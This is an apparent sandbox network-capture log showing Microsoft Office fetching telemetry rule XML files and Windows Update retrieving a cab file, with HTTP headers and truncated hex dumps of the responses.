                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    121192.168.2.56049113.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1390
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE3002601"
                                                                                                                                                                                                                                                    x-ms-request-id: 903d1aff-701e-0050-019c-276767000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120839Z-16849878b78qwx7pmw9x5fub1c00000004r00000000030g0
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    122192.168.2.56049213.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1401
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                                                                                    x-ms-request-id: 3a798620-501e-00a0-0295-279d9f000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120839Z-16849878b78j5kdg3dndgqw0vg000000085000000000dhth
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    123192.168.2.56048952.149.20.212443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=VatNPFTcculonAy&MD=pDKKvD8Y HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                    ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                    MS-CorrelationId: 7c1fa8cb-791b-4d2e-a784-73d8c1178790
                                                                                                                                                                                                                                                    MS-RequestId: 6338d029-90e8-4781-8f5d-76960ce46c2b
                                                                                                                                                                                                                                                    MS-CV: iaYK72N+MUiK4TQp.0
                                                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Content-Length: 30005
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                    Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                    Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    124192.168.2.56049313.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:39 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:39 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1364
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                                                                                    x-ms-request-id: 4e9c2d7b-a01e-0053-0a2e-278603000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120839Z-15b8d89586fqj7k5h9gbd8vs9800000007rg0000000032gm
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    125192.168.2.56049413.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1391
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                                                                                    x-ms-request-id: 92eac08a-601e-0001-29b2-26faeb000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120840Z-16849878b78j7llf5vkyvvcehs00000007q0000000001geq
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    126192.168.2.56049513.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1354
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                                                                                    x-ms-request-id: 8ce6a12a-601e-005c-62fe-26f06f000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120840Z-16849878b78qf2gleqhwczd21s00000006m000000000eu3v
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    127192.168.2.56049613.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1403
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                                                                                    x-ms-request-id: a1e8ab16-701e-0050-601c-266767000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120840Z-16849878b78fhxrnedubv5byks00000004w00000000059hf
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                    128192.168.2.56049713.107.246.45443
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                    2024-10-29 12:08:40 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:08:40 GMT
                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                    Content-Length: 1366
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                                                                                    ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                                                                                    x-ms-request-id: 7acc01d2-801e-00ac-78ea-28fd65000000
                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                    x-azure-ref: 20241029T120840Z-r197bdfb6b42rt68rzg9338g1g00000007r0000000006198
                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
